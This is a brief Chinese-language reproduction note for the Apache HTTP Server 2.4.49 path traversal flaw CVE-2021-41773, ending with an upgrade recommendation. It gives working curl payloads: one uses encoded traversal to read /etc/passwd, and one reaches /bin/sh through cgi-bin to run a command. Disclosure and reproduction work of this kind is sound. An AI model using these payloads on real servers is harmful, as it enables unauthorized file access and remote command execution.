漏洞描述:
CVE-2021-41773 漏洞是在 9 月 15 日发布的 2.4.49 版中对路径规范化所做的更改引入到 Apache HTTP Server 中的。此漏洞仅影响具有"require all denied"访问权限控制配置被禁用的Apache HTTP Server 2.4.49 版本。成功的利用将使远程攻击者能够访问易受攻击的 Web 服务器上文档根目录之外的任意文件。根据该公告,该漏洞还可能泄露"CGI 脚本等解释文件的来源",其中可能包含攻击者可以利用该漏洞进行进一步攻击的敏感信息。
复现过程:
1.访问ip:port
2.文件读取
cs
curl -v --path-as-is http://ip:port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
3.命令执行
cs
curl --data "echo;whoami" http://ip:port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
修复建议:
确保Apache HTTP Server更新到最新的版本2.4.50。